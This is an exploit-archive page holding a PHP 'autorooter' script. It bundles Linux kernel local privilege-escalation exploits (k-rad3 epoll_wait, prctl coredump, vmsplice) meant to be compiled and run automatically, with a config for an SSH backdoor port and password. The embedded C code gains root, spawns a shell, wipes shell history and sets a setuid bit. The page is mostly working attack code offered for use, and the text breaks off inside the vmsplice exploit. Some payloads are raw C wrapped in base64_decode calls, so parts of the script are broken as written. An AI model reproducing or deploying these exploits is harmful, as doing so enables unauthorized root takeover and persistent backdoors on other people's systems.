exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

PHP Autorooter Script

PHP Autorooter Script
Posted Dec 30, 2008
Authored by Rohit Bansal

PHP Autorooter that encodes exploits in Base64 and then decodes them and compiles them with gcc.

tags | exploit, php
SHA-256 | dad858b67667d67dc91c0c6bb8aa6779134347d2029f21d5bec096a6b7bcf35d

PHP Autorooter Script

Change Mirror Download
<?PHP
/*
Rohit Bansal
[B]Root Forcer
MSN: rohitisback@gmail.com
*/
/***********************************
Your Config Info
***********************************/
$port = "8080"; // Your port to be used if Root is obtained (for SSHdoor)
$pass = "Roxors"; // Your password to be used if Root is obtained (for SSHdoor)
$dir = "expl0it"; // The folder where all exploits are stored (will be removed after root or failure)
/***********************************
Exploit Variables
***********************************/
$two_six = array(); // all 2.6 exploits get stored as an array for later foreach usage

//Linux 2.6.x - 2.6.11
$two_six[0] = base64_decode("/*
* k-rad3.c - linux 2.6.11 and below CPL 0 kernel local exploit v3
* Discovered and original exploit coded Jan 2005 by sd <sd@fucksheep.org>
*
*********************************************************************
*
* Modified 2005/9 by alert7 <alert7@xfocus.org>
* XFOCUS Security Team http://www.xfocus.org
*
* gcc -o k-rad3 k-rad3.c -static -O2
*
* tested succeed :
*        on default installed RHEL4(2.6.9-5.EL and 2.6.9-5.ELsmp)
*             2.6.9-5.EL ./k-rad3 -p 2
*             2.6.9-5.ELsmp ./k-rad3 -a -p 7
*        on default installed maglic linux 1.2 
*             MagicLinux 2.6.9 #1 ./k-rad3 -t 1 -p 2
*
* thank watercloud tested maglic linux 1.2
* thank eist provide RHEL4 to test
* thank sd <sd@fucksheep.org> share his stuff.
* thank xfocus & xfocus\'s firends
*
*
* TODO:
*         CASE 1: use stack > 0xc0000000
*         CASE 2: CONFIG_X86_PAE define ,but cpu flag no pse
*
*[alert7@MagicLinux ~]$ ./k-rad3 -h
*[  k-rad3 - <=linux 2.6.11 CPL 0 kernel exploit  ]
*[ Discovered Jan 2005 by sd <sd@fucksheep.org> ]
*[ Modified 2005/9 by alert7 <alert7@xfocus.org> ]
*
*Usage: ./k-rad3
*       -s forced cpu flag pse
*        -a define CONFIG_X86_PAE,default none
*        -e <num> have two kernel code,default 0
*        -p <num> alloc pages(4k) ,default 1. Increase from 1 to 7
*                The higher number the more likely it will crash
*        -t <num> default 0
*                0 :THREAD_SIZE is 4096;otherwise THREAD_SIZE is 8192
*
*[alert7@MagicLinux ~]$ ./k-rad3 -t 1 -p 2
*[  k-rad3 - <=linux 2.6.11 CPL 0 kernel exploit  ]
*[ Discovered Jan 2005 by sd <sd@fucksheep.org> ]
*[ Modified 2005/9 by alert7 <alert7@xfocus.org> ]
*[+] try open /proc/cpuinfo .. ok!!
*[+] find cpu flag pse in /proc/cpuinfo
*[+] CONFIG_X86_PAE :none
*[+] Cpu flag: pse ok
*[+] Exploit Way : 0
*[+] Use 2 pages (one page is 4K ),rewrite 0xc0000000--(0xc0002000 + n)
*[+] thread_size 1 (0 :THREAD_SIZE is 4096;otherwise THREAD_SIZE is 8192
*[+] idtr.base 0xc0461000 ,base 0xc0000000
*[+] kwrite base 0xc0000000, buf 0xbffed750,num 8196
*[+] idt[0x7f] addr 0xffc003f8
*[+] j00 1u(k7 k1d!
*[root@k-rad3 ~] #id
*uid=0(root) gid=0(root) groups=500(alert7)
*
*
*  Linux Kernel <= 2.6.11 \"sys_epoll_wait\" Local integer overflow Exploit
* 
* \"it is possible to partially overwrite low kernel ( >= 2.6 <= 2.6.11) 
* memory due to integer overflow in sys_epoll_wait and misuse of
* __put_user in ep_send_events\"
* Georgi Guninski: http://seclists.org/lists/fulldisclosure/2005/Mar/0293.html
*
*********************************************************************
*
*
* In memory of pwned.c (uselib)
* 
* - Redistributions of source code is not permitted.
* - Redistributions in the binary form is not permitted.
* - Redistributions of the above copyright notice, this list of conditions,
* and the following disclaimer is permitted.
* - By proceeding to a Redistribution and under any form of the Program
* the Distributor is granting ownership of his Resources without
* limitations to the copyright holder(s).
*
* 
* Since we already owned everyone, theres no point keeping this private
* anymore.
*
* http://seclists.org/lists/fulldisclosure/2005/Mar/0293.html
*
* Thanks to our internet hero georgi guninski for being such incredible
* whitehat disclosing one of the most reliable kernel bugs.
* You saved the world, man, we owe you one!
*
* This version is somewhat broken, but skilled reader will get an idea.
* Well, at least let the scriptkids have fun for a while.
*
* Thanks to all who helped me developing/testing this, you know who you are,
* and especially to my gf for guidance while coding this.
*
*/

#define _GNU_SOURCE

#include <stdlib.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/epoll.h>
#include <sys/mman.h>
#include <sys/resource.h>
#include <linux/capability.h>
#include <asm/unistd.h>
#ifndef __USE_GNU
	#define __USE_GNU
#endif
#include <unistd.h>
#include <errno.h>
#include <signal.h>
#include <string.h>

/**
  * Relationship Variables
  *
  * 1: CONFIG_X86_PAE 
  *     see /lib/modules/`uname -r`/build/.config
  *     1.1: pse
  * 2: THREAD_SIZE
  *     see include/asm/thread_info.h THREAD_SIZE define
  */


#define MAP (0xfffff000 - (1023*4096))
#define MAP_PAE (0xfffff000 - (511*4096))
#define MKPTE(addr) ((addr & (~4095)) | 0x27)
#define MKPMD(x) (0x1e3|0x004)

////////////////////////////////////////////////

#define KRADPS1 \"k-rad3\"

#define kB * 1024
#define MB * 1024 kB
#define GB * 1024 MB

#define KRS \"\\033[1;30m[ \\033[1;37m\"
#define KRE \"\\033[1;30m ]\\033[0m\"
#define KRAD \"\\033[1;30m[\\033[1;37m*\\033[1;30m]\\033[0m \"
#define KRADP \"\\033[1;30m[\\033[1;37m+\\033[1;30m]\\033[0m \"
#define KRADM \"\\033[1;30m[\\033[1;37m-\\033[1;30m]\\033[0m \"

#define SET_IDT_GATE(idt,ring,s,addr) \\
	(idt).off1 = addr & 0xffff; \\
	(idt).off2 = addr >> 16; \\
	(idt).sel = s; \\
	(idt).none = 0; \\
	(idt).flags = 0x8E | (ring << 5); 

//config val
static int havepse 		= 0;
static int definePAE	= 0;
static int exploitway	= 0;
static int npages 		= 1;
static int thread_size   = 0;


static uid_t uid		= 0;
static unsigned long long *clear1;
static char * progargv0;

struct idtr {
	unsigned short limit;
	unsigned int base;
} __attribute__ ((packed));

struct idt {
	unsigned short off1;
	unsigned short sel;
	unsigned char none,flags;
	unsigned short off2;
} __attribute__ ((packed));



#define __syscall_return(type, res) \\
do { \\
	if ((unsigned long)(res) >= (unsigned long)(-125)) { \\
	errno = -(res); \\
	res = -1; \\
	} \\
	return (type) (res); \\
} while (0)


#define _capget_macro(type,name,type1,arg1,type2,arg2) \\
	type name(type1 arg1,type2 arg2) \\
	{ \\
	long __res; \\
	__asm__ volatile ( \"int $0x80\" \\
	: \"=a\" (__res) \\
	: \"0\" (__NR_##name),\"b\" ((long)(arg1)),\"c\" ((long)(arg2))); \\
	__syscall_return(type,__res); \\
	}

static inline _capget_macro(int,capget,void *,a,void *,b);

static int THREAD_SIZE_MASK =(-4096);


static void 
fatal(const char *message)
{
	system(\"uname -a\");
	printf(\"[-] %s\\n\",message);
	exit(1);
}

void kernel(unsigned * task)
{
	unsigned * addr = task;
	/* looking for uids */

	*clear1 = 0;

	while (addr[0] != uid || addr[1] != uid ||
		addr[2] != uid || addr[3] != uid
		)
		addr++;
	
	addr[0] = addr[1] = addr[2] = addr[3] = 0; /* set uids */
	addr[4] = addr[5] = addr[6] = addr[7] = 0; /* set gids */

}
 
void kcode(void);
void __kcode(void)
{
	asm(
	\"kcode: \\n\"
	\"cld \\n\"
	\" pusha \\n\"
	\" pushl %es \\n\"
	\" pushl %ds \\n\"
	\" movl %ss,%edx \\n\"
	\" movl %edx,%es \\n\"
	\" movl %edx,%ds \\n\");
	__asm__(\"movl %0 ,%%eax\" ::\"m\"(THREAD_SIZE_MASK) );
	asm(
	\" andl %esp,%eax \\n\"
	\" pushl (%eax) \\n\"
	\" call kernel \\n\"
	\" addl $4, %esp \\n\"
	\" popl %ds \\n\"
	\" popl %es \\n\"
	\" popa \\n\"
	\" cli \\n\"
	\" iret \\n\"
	);
}


void raise_cap(unsigned long *ts)
{
/* must be on lower addresses because of kernel arg check :) */
static struct __user_cap_header_struct head;
static struct __user_cap_data_struct data;
static struct __user_cap_data_struct n;

int i;

*clear1 = 0;
head.version = 0x19980330;
head.pid = 0;
capget(&head, &data);
/* scan the thread_struct */
for (i = 0; i < 512; i++, ts++) 
{
	/* is it capabilities block? */
	if (  (ts[0] == data.effective) &&
		(ts[1] == data.inheritable) &&
		(ts[2] == data.permitted)) 
	{
		/* set effective cap to some val */
		ts[0] = 0x12341234;
		capget(&head, &n);
		/* and test if it has changed */
		if (n.effective == ts[0]) 
		{
			/* if so, we\'re in :) */
			ts[0] = ts[1] = ts[2] = 0xffffffff;
			return;
		}
		/* otherwise fix back the stuff
		(if we\'ve not crashed already :) */
		ts[0] = data.effective;
	}
}
return;
}


void stub(void);
void __stub(void)
{
	asm (
	\"stub:;\"
	\" pusha;\"
	);
	__asm__(\"movl %0 ,%%eax\" ::\"m\"(THREAD_SIZE_MASK) );
	asm(
	\" and %esp, %eax;\"
	\" pushl (%eax);\"
	\" call raise_cap;\"
	\" pop %eax;\"
	\" popa;\"
	\" iret;\"
	);

}


/* write to kernel from buf, num bytes */
static int 
kwrite(unsigned base, char *buf, int num)
{
#define DIV 256
#define RES 4

int efd, c, i, fd;
int pi[2];
struct epoll_event ev;
int *stab;
unsigned long ptr;
int count;
unsigned magic = 0xffffffff / 12 + 1;

	printf(\"[+] kwrite base %p, buf %p,num %d\\n\", (void *)base,buf,num);
	/* initialize epoll */
	efd = epoll_create(4096);
	if (efd < 0)
		return -1;
	
	ev.events = EPOLLIN|EPOLLOUT|EPOLLPRI|EPOLLERR|EPOLLHUP;

	/* 12 bytes per fd + one more to be safely in stack space */
	count = (num+11)/12+RES;

	/* desc array */
	stab = alloca((count+DIV-1)/DIV*sizeof(int));

	for (i = 0; i < ((count+DIV-1)/DIV)+1; i++) 
	{

		if (socketpair(AF_UNIX, SOCK_DGRAM, 0, pi) < 0)
			return -1;

		send(pi[0], \"a\", 1, 0);
		stab[i] = pi[1];
	}

	/* highest fd and first descriptor */
	fd = pi[1];
	/* we\'ve to allocate this separately because we need to have
	it\'s fd preserved - using this we\'ll be writing actual bytes */
	epoll_ctl(efd, EPOLL_CTL_ADD, fd, &ev);
	//printf(\"EPOLL_CTL_ADD count %u\\n\",count);
	for (i = 0, c = 0; i < (count-1); i++) 
	{
		int n;
		n = dup2(stab[i/DIV], fd+2+(i % DIV));
		if (n < 0)
			return -1;
		epoll_ctl(efd, EPOLL_CTL_ADD, n, &ev);
		close(n);
	}

	/* in \'n\' we\'ve the latest fd we\'re using to write data */
	for (i = 0; i < ((num+7)/8); i++) 
	{
		/* data being written from end */
		memcpy(&ev.data, buf + num - 8 - i * 8, 8);
		epoll_ctl(efd, EPOLL_CTL_MOD, fd, &ev);

		/* the actual kernel magic */
		ptr = (base + num - (i*8)) - (count * 12);
		struct epoll_event *events =(struct epoll_event *)ptr;
		//printf(\"epoll_wait verify_area(%p,%p) addr %p %p\\n\",ptr,magic* sizeof(struct epoll_event) ,&events[0].events,magic);
		int iret =epoll_wait(efd, (void *) ptr, magic, 31337);
		if (iret ==-1)
		{
			perror(\"epoll_wait\");
			fatal(\"This kernel not vulnerability!!!\");

		}
		/* don\'t ask why (rotten rb-trees) :) */
		if (i)
		{
			//printf(\"epoll_wait verify_area(%p,%p) %p\\n\",ptr,magic* sizeof(struct epoll_event) ,magic);
			iret = epoll_wait(efd, (void *)ptr, magic, 31337);
	                if (iret ==-1)
        	        {
                	       perror(\"epoll_wait\");
				fatal(\"This kernel not vulnerability!!!\");
	
        	        }

		}
	}

	close(efd);
	for (i = 3; i <= fd; i++)
		close(i);
	
	return 0;
	
}

/* real-mode interrupt table fixup - point all interrupts to iret.
let\'s hope this will shut up apm */
static void
fixint(char *buf)
{
unsigned *tab = (void *) buf;
int i;

	for (i = 0; i < 256; i++)
		tab[i] = 0x0000400; /* 0000:0400h */
	/* iret */
	buf[0x400] =0xcf; 
}

/* establish pte pointing to virtual addr \'addr\' */
static int 
map_pte(unsigned base, int pagenr, unsigned addr)
{
	unsigned *buf = alloca(pagenr * 4096 + 8);
	buf[(pagenr) * 1024] = MKPTE(addr);
	buf[(pagenr) * 1024+1] = 0;	
	fixint((void *)buf);
	return kwrite(base, (void *)buf, pagenr * 4096 + 4);
}

/* make pme user can rw */
static int 
map_pme(unsigned base, int pagenr, unsigned addr)
{
	unsigned *buf = alloca(pagenr * 4096 + 32);
	buf[(pagenr) * 1024] = MKPMD(addr);
	buf[(pagenr) * 1024+1] = 0;	
	buf[(pagenr) * 1024+2] = MKPMD(addr)|0x00200000;
	buf[(pagenr) * 1024+3] = 0;	
	fixint((void *)buf);
	return kwrite(base, (void *)buf, pagenr * 4096 + 4*3);
}


static void 
error(int d)
{
	printf(KRADM \"y3r 422 12 n07 3r337 3nuPh!\\n\" KRAD \"Try increase nrpages?\\n\");
	exit(1);
}

 	char *bashargv[] = { KRADPS1, NULL };
	char *bashenvp[] = { 	\"TERM=linux\", \"PS1=[\\\\u@\"KRADPS1\" \\\\W]\\\\$ \", \"BASH_HISTORY=/dev/null\",
					\"HISTORY=/dev/null\", \"history=/dev/null\",\"HISTFILE=/dev/null\",
					\"PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin\", NULL };

static int 
exploit(unsigned kernelbase, int npages)
{
	struct idt *idt;
	struct idtr idtr;



	signal(SIGSEGV, error);
	signal(SIGBUS, error);


	/* get idt descriptor addr */
	asm (\"sidt %0\" : \"=m\" (idtr));
	/*
	  * if OS in vmware , idtr.base is not right,please fix it
	  * [alert7@MagicLinux ~]$ cat /boot/System.map|grep idt_table
	  * c0461000 D idt_table
	  * //idtr.base = 0xc0461000;
	  */
	
	printf(\"[+] idtr.base %p ,base %p\\n\",(void *)idtr.base , (void *)kernelbase);
	
	if ( !definePAE )
	{
		map_pte(kernelbase, npages, idtr.base - kernelbase);
		//	idt = pae?(void *)MAP_PAE:(void *)MAP;		
		idt = (struct idt *)MAP;
	}else
	{
		/* TODO: pse disable case */
		if ( !havepse)
			printf(\"[!Waring!] TODO:CONFIG_X86_PAE define ,but cpu flag no pse\\n\");
		
		map_pme(kernelbase, npages, idtr.base - kernelbase);
		idt = (struct idt *) idtr.base;
	}

#if 0
	int * p = (int *) idt;
	int i;
	for (i=0;i<1024;i++,p++)
		printf( \"* %p 0x%x\\n\",p,*p);
	fflush(stdout);
#endif

	/**
	  * cleanup the stuff to prevent others spotting the gate 
	  * - must be done from ring 0 
	  */
	clear1 = (void *) &idt[0x7f];
	printf(\"[+] idt[0x7f] addr %p\\n\",clear1);

	if ( exploitway == 0)
	{
		SET_IDT_GATE(idt[0x7f], 3, idt[0x80].sel, ((unsigned long) &kcode));
	}
	else 
	{
		SET_IDT_GATE(idt[0x7f], 3, idt[0x80].sel, ((unsigned long) &stub));
	}
	
	//[2] SET_IDT_GATE(idt[0x7f], 3, idt[0x80].sel, ((unsigned long) &stub));
	/**
	  * also can use [2] stub function,but it may cause this message
	  *
	  *	Sep 11 13:11:59 AD4 kernel: Debug: sleeping function called from invalid context at include/asm/uaccess.h:531
	  *	Sep 11 13:11:59 AD4 kernel: in_atomic():0[expected: 0], irqs_disabled():1
	  *	Sep 11 13:11:59 AD4 kernel:  [<c011ca30>] __might_sleep+0x7d/0x89
	  *	Sep 11 13:11:59 AD4 kernel:  [<c01270bd>] sys_capget+0x1d5/0x216
	  *	Sep 11 13:11:59 AD4 kernel:  [<c0301bfb>] syscall_call+0x7/0xb
	  *	Sep 11 13:11:59 AD4 kernel:  [<c017007b>] pipe_writev+0x24/0x320
	  *	Sep 11 13:11:59 AD4 kernel:  [<c01619a4>] filp_close+0x59/0x5f
	  *
	  */

	/* call raise_cap or kernel */
	asm (\"int $0x7f\");
	printf(KRADP \"j00 1u(k7 k1d!\\n\");
	setresuid(0, 0, 0);
	setresgid(0, 0, 0);
	char cmdbuf[1024];
	snprintf(cmdbuf,1024,\"chown root %s;chmod +s %s\",progargv0,progargv0);
	system(cmdbuf);
	
	execve(\"/bin/sh\", bashargv, bashenvp);
	exit(0);
}



static void 
usage(char *n)
{
		
	printf(\"\\nUsage: %s\\n\",n);
	printf(\"\\t-s forced cpu flag pse \\n\");
	printf(\"\\t-a define CONFIG_X86_PAE,default none\\n\");
	printf(\"\\t-e <num> have two kernel code,default 0\\n\");
	printf(\"\\t-p <num> alloc pages(4k) ,default 1. Increase from 1 to 7\\n\"
		 \"\\t\\tThe higher number the more likely it will crash\\n\");
	printf(\"\\t-t <num> default 0 \\n\"
		  \"\\t\\t0 :THREAD_SIZE is 4096;otherwise THREAD_SIZE is 8192\\n\");
	printf(\"\\n\");
	_exit(1);
}


/*read /proc/cpuinfo to set  havepse*/
static void 
read_proc(void)
{
            FILE * fp;
            char * line = NULL;
            size_t len = 0;
            ssize_t read;
	     printf(\"[+] try open /proc/cpuinfo ..\");
            fp = fopen(\"/proc/cpuinfo\", \"r\");
            if (fp == NULL)
            {
                 printf(\" failed!!\\n\");
                 return;
            }
	     printf(\" ok!!\\n\");	
		 
	     int cpus = 0;	
	     int pse = 0;
            while ((read = getline(&line, &len, fp)) != -1) 
		{

		   if (strstr(line,\"flags\"))
		   {
			if(strstr(line ,\"pse \"))
			{
				pse ++;
			}
		   }

            }
	     fclose(fp);
		 
            if (line)
                 free(line);
			
	     if ( pse )
		{
				printf(\"[+] find cpu flag pse in /proc/cpuinfo\\n\");
				havepse = 1;
	     	}

            return ;

}

static void 
get_config(int ac, char **av)
{
	
	uid = getuid();
	progargv0 = av[0];

	int r;
	
	while(ac) {
		r = getopt(ac, av, \"e:p:t:ash\");
		
		if(r<0) break;

		switch(r) {

			case \'s\' :
			//pse
				havepse = 1;
				break;

			case \'a\' :
			//define CONFIG_X86_PAE
				definePAE = 1;
				break;

			case \'e\' :
				exploitway = atoi(optarg);
				if(exploitway<0) fatal(\"bad exploitway value\");
				break;

			case \'p\' :
				npages = atoi(optarg);
				break;
			case \'t\' :
				thread_size = atoi(optarg);
				
				break;				
				
			case \'h\' :
			default:
				usage(av[0]);
				break;
		}
	}	

	THREAD_SIZE_MASK = (thread_size==0)?(-4096):(-8192);

	read_proc();
}

static void 
print_config(unsigned long kernebase)
{
	printf(\"[+] CONFIG_X86_PAE :%s\\n\",	definePAE 	?\"ok\":\"none\");
	printf(\"[+] Cpu flag: pse %s\\n\",			havepse		?\"ok\":\"none\");	
	printf(\"[+] Exploit Way : %d\\n\",		exploitway);
	printf(\"[+] Use %d pages (one page is 4K ),rewrite 0x%lx--(0x%lx + n)\\n\",
			npages,kernebase,kernebase+npages*4 kB);
	printf(\"[+] thread_size %d (0 :THREAD_SIZE is 4096;otherwise THREAD_SIZE is 8192 \\n\",thread_size);
	fflush(stdout);
}


void prepare(void)
{
    if (geteuid() == 0) 
    {
	 setresuid(0, 0, 0);
	 setresgid(0, 0, 0);
      	 execve(\"/bin/sh\", bashargv, bashenvp);
        fatal(\"[-] Unable to spawn shell\");
    }
}

int
main(int argc, char **argv)
{
	char eater[65536];
	unsigned long kernelbase;

	/* unlink(argv[0]); */
	// sync();
	
	printf(KRS \" \"KRADPS1\" - <=linux 2.6.11 CPL 0 kernel exploit \" KRE \"\\n\"
		KRS \"Discovered Jan 2005 by sd <sd@fucksheep.org>\" KRE \"\\n\"
		KRS \"Modified 2005/9 by alert7 <alert7@xfocus.org>\" KRE \"\\n\");

	if ( (unsigned long)eater > 0xc0000000)
	{
		printf(\"[!Waring!] TODO:use stack > 0xc0000000 \\n\");
		return 0;
	}
	
	prepare();
	
	get_config(argc,argv);

	kernelbase =(unsigned long)eater ;
	kernelbase +=0x0fffffff;
	kernelbase &=0xf0000000;
	
	print_config(kernelbase);

	exploit(kernelbase, npages<0?-npages:npages);

	return 0;

}
");

//Linux 2.6.13 - 2.6.17
$two_six[1] = base64_decode("LyogTGludXggPj0gMi42LjEzIHByY3RsIGtlcm5lbCBleHBsb2l0DQogKg0KICogKEMpIEp1bGllbiBUSU5ORVMNCiAqDQogKiBJZiB5b3UgcmVhZCB0aGUgQ2hhbmdlbG9nIGZyb20gMi42LjEzIHlvdVwndmUgcHJvYmFibHkgc2VlbjoNCiAqICBbUEFUQ0hdIHNldHVpZCBjb3JlIGR1bXANCiAqIA0KICogVGhpcyBwYXRjaCBtYWlubHkgYWRkcyBzdWlkc2FmZSB0byBzdWlkX2R1bXBhYmxlIHN5c2N0bCBidXQgYWxzbyBhIG5ldyBwZXIgcHJvY2VzcywNCiAqIHVzZXIgc2V0YWJsZSBhcmd1bWVudCB0byBQUl9TRVRfRFVNUEFCTEUuDQogKiANCiAqIFRoaXMgZmxhdyBhbGxvd3MgdXMgdG8gY3JlYXRlIGEgcm9vdCBvd25lZCBjb3JlZHVtcCBpbnRvIGFueSBkaXJlY3RvcnkuDQogKiBUaGlzIGlzIHRyaXZpYWxseSBleHBsb2l0YWJsZS4NCiAqDQogKi8NCg0KI2luY2x1ZGUgPHN5cy90eXBlcy5oPg0KI2luY2x1ZGUgPHN5cy90aW1lLmg+DQojaW5jbHVkZSA8c3lzL3Jlc291cmNlLmg+DQojaW5jbHVkZSA8c3lzL3ByY3RsLmg+DQojaW5jbHVkZSA8dW5pc3RkLmg+DQojaW5jbHVkZSA8c3RkaW8uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KI2luY2x1ZGUgPHNpZ25hbC5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPHRpbWUuaD4NCg0KI2RlZmluZSBDUk9ORCBcIi9ldGMvY3Jvbi5kXCINCiNkZWZpbmUgQlVGU0laRSAyMDQ4DQoNCg0Kc3RydWN0IHJsaW1pdCBteXJsaW1pdD17UkxJTV9JTkZJTklUWSwgUkxJTV9JTkZJTklUWX07DQoNCmNoYXIJY3JvbnRlbXBsYXRlW109DQpcIiMvZXRjL2Nyb24uZC9jb3JlIHN1aWRfZHVtcGFibGUgZXhwbG9pdFxcblwiDQpcIlNIRUxMPS9iaW4vc2hcXG5cIg0KXCJQQVRIPS91c3IvbG9jYWwvc2JpbjovdXNyL2xvY2FsL2Jpbjovc2JpbjovYmluOi91c3Ivc2JpbjovdXNyL2JpblxcblwiDQpcIiMlcyogKiAqICogKglyb290CSBjaG93biByb290OnJvb3QgJXMgJiYgY2htb2QgNDc1NSAlcyAmJiBybSAtcmYgJXMgJiYga2lsbCAtVVNSMSAlZFxcblwiOw0KDQpjaGFyCWNyb25zdHJpbmdbQlVGU0laRV07DQpjaGFyCWZuYW1lW0JVRlNJWkVdOw0KDQpzdHJ1Y3QgdGltZXZhbCB0ZTsNCg0Kdm9pZCBzaChpbnQgc24pIHsNCglleGVjbChmbmFtZSwgZm5hbWUsIChjaGFyICopIE5VTEwpOw0KfQ0KCQ0KDQppbnQJbWFpbihpbnQgYXJnYywgY2hhciAqYXJndltdKSB7DQoNCglpbnQgbncsIHBpZDsNCg0KCWlmIChnZXRldWlkKCkgPT0gMCkgew0KCQlwcmludGYoXCJbK10gZ2V0dGluZyByb290IHNoZWxsXFxuXCIpOw0KCQlzZXR1aWQoMCk7DQoJCXNldGdpZCgwKTsNCgkJaWYgKGV4ZWNsKFwiL2Jpbi9zaFwiLCBcIi9iaW4vc2hcIiwgKGNoYXIgKikgTlVMTCkpIHsNCgkJCXBlcnJvcihcIlstXSBleGVjbGVcIik7DQoJCQlyZXR1cm4gMTsNCgkJfQ0KCX0NCg0KCXByaW50ZihcIlxcbnByY3RsKCkgc3VpZHNhZmUgZXhwbG9pdFxcblxcbihDKSBKdWxpZW4gVElOTkVTXFxuXFxuXCIpOw0KDQoJLyogZ2V0IG91ciBmaWxlIG5hbWUgKi8NCglpZiAocmVhZGxpbmsoXCIvcHJvYy9zZWxmL2V4ZVwiLCBmbmFtZSwgc2l6ZW9mKGZuYW1lKSkgPT0gLTEpIHsNCgkJcGVycm9yKFwiWy1dIHJlYWRsaW5rXCIpOw0KCQlwcmludGYoXCJUaGlzIGlzIG5vdCBmYXRhbCwgcmV3cml0ZSB0aGUgZXhwbG9pdFxcblwiKTsNCgl9DQoNCglpZiAoc2lnbmFsKFNJR1VTUjEsIHNoKSA9PSBTSUdfRVJSKSB7DQoJCXBlcnJvcihcIlstXSBzaWduYWxcIik7DQoJCXJldHVybiAxOw0KCX0NCglwcmludGYoXCJbK10gSW5zdGFsbGVkIHNpZ25hbCBoYW5kbGVyXFxuXCIpOw0KDQoJLyogTGV0IHVzIGNyZWF0ZSBjb3JlIGZpbGVzICovDQoJc2V0cmxpbWl0KFJMSU1JVF9DT1JFLCAmbXlybGltaXQpOw0KCWlmIChjaGRpcihDUk9ORCkgPT0gLTEpIHsNCgkJcGVycm9yKFwiWy1dIGNoZGlyXCIpOw0KCQlyZXR1cm4gMTsNCgl9DQoNCgkvKiBleHBsb2l0IHRoZSBmbGF3ICovDQoJaWYgKHByY3RsKFBSX1NFVF9EVU1QQUJMRSwgMikgPT0gLTEpIHsNCgkJcGVycm9yKFwiWy1dIHBydGN0bFwiKTsNCgkJcHJpbnRmKFwiSXMgeW91IGtlcm5lbCB2ZXJzaW9uID49IDIuNi4xMyA/XFxuXCIpOw0KCQlyZXR1cm4gMTsNCgl9DQoNCglwcmludGYoXCJbK10gV2UgYXJlIHN1aWRzYWZlIGR1bXBhYmxlIVxcblwiKTsNCg0KCS8qIEZvcmdlIHRoZSBzdHJpbmcgZm9yIG91ciBjb3JlIGR1bXAgKi8NCgludz1zbnByaW50Zihjcm9uc3RyaW5nLCBzaXplb2YoY3JvbnN0cmluZyksIGNyb250ZW1wbGF0ZSwgXCJcXG5cIiwgZm5hbWUsIGZuYW1lLCBDUk9ORFwiL2NvcmVcIiwgZ2V0cGlkKCkpOw0KCWlmIChudyA+PSBzaXplb2YoY3JvbnN0cmluZykpIHsNCgkJcHJpbnRmKFwiWy1dIGNyb25zdHJpbmcgaXMgdG9vIHNtYWxsXFxuXCIpOw0KCQlyZXR1cm4gMTsNCgl9DQoJcHJpbnRmKFwiWytdIE1hbGljaW91cyBzdHJpbmcgZm9yZ2VkXFxuXCIpOw0KDQoJaWYgKChwaWQ9Zm9yaygpKSA9PSAtMSkgew0KCQlwZXJyb3IoXCJbLV0gZm9ya1wiKTsNCgkJcmV0dXJuIDE7DQoJfQ0KDQoJaWYgKHBpZCA9PSAwKSB7DQoJCS8qIFRoaXMgaXMgbm90IHRoZSBnb29kIHdheSB0byBkbyBpdCA7KSAqLw0KCQlzbGVlcCgxMjApOw0KCQlleGl0KDApOw0KCX0NCg0KCS8qIFNFR0ZBVUxUIHRoZSBjaGlsZCAqLw0KCXByaW50ZihcIlsrXSBTZWdmYXVsdGluZyBjaGlsZFxcblwiKTsNCglpZiAoa2lsbChwaWQsIDExKSA9PSAtMSkgew0KCQlwZXJyb3IoXCJbLV0ga2lsbFwiKTsNCgkJcmV0dXJuIDE7DQoJfQ0KCWlmIChnZXR0aW1lb2ZkYXkoJnRlLCBOVUxMKSA9PSAwKSANCgkJcHJpbnRmKFwiWytdIFdhaXRpbmcgZm9yIGV4cGxvaXQgdG8gc3VjY2VlZCAofiVsZCBzZWNvbmRzKVxcblwiLCA2MCAtICh0ZS50dl9zZWMlNjApKTsNCglzbGVlcCgxMjApOw0KDQoJcHJpbnRmKFwiWy1dIEl0IGxvb2tzIGxpa2UgdGhlIGV4cGxvaXQgZmFpbGVkXFxuXCIpOw0KDQoJcmV0dXJuIDE7DQp9DQo=");

//Linux 2.6.17 - 2.6.24.1
$two_six[2] = base64_decode("/*
 * jessica_biel_naked_in_my_bed.c
 *
 * Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
 * Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.
 * Stejnak je to stare jak cyp a aj jakesyk rozbite.
 *
 * Linux vmsplice Local Root Exploit
 * By qaaz
 *
 * Linux 2.6.17 - 2.6.24.1
 *
 * This is quite old code and I had to rewrite it to even compile.
 * It should work well, but I don\'t remeber original intent of all
 * the code, so I\'m not 100% sure about it. You\'ve been warned ;)
 * 
 * -static -Wno-format  
 */
#define _GNU_SOURCE
#include <stdio.h>
#include <errno.h>
#include <stdlib.h>
#include <string.h>
#include <malloc.h>
#include <limits.h>
#include <signal.h>
#include <unistd.h>
#include <sys/uio.h>
#include <sys/mman.h>
#include <asm/page.h>
#define __KERNEL__
#include <asm/unistd.h>

#define PIPE_BUFFERS	16
#define PG_compound	14
#define uint		unsigned int
#define static_inline	static inline __attribute__((always_inline))
#define STACK(x)	(x + sizeof(x) - 40)

struct page {
	unsigned long flags;
	int count;
	int mapcount;
	unsigned long private;
	void *mapping;
	unsigned long index;
	struct { long next, prev; } lru;
};

void	exit_code();
char	exit_stack[1024 * 1024];

void	die(char *msg, int err)
{
	printf(err ? \"[-] %s: %s\\n\" : \"[-] %s\\n\", msg, strerror(err));
	fflush(stdout);
	fflush(stderr);
	exit(1);
}

#if defined (__i386__)

#ifndef __NR_vmsplice
#define __NR_vmsplice	316
#endif

#define USER_CS		0x73
#define USER_SS		0x7b
#define USER_FL		0x246

static_inline
void	exit_kernel()
{
	__asm__ __volatile__ (
	\"movl %0, 0x10(%%esp) ;\"
	\"movl %1, 0x0c(%%esp) ;\"
	\"movl %2, 0x08(%%esp) ;\"
	\"movl %3, 0x04(%%esp) ;\"
	\"movl %4, 0x00(%%esp) ;\"
	\"iret\"
	: : \"i\" (USER_SS), \"r\" (STACK(exit_stack)), \"i\" (USER_FL),
	    \"i\" (USER_CS), \"r\" (exit_code)
	);
}

static_inline
void *	get_current()
{
	unsigned long curr;
	__asm__ __volatile__ (
	\"movl %%esp, %%eax ;\"
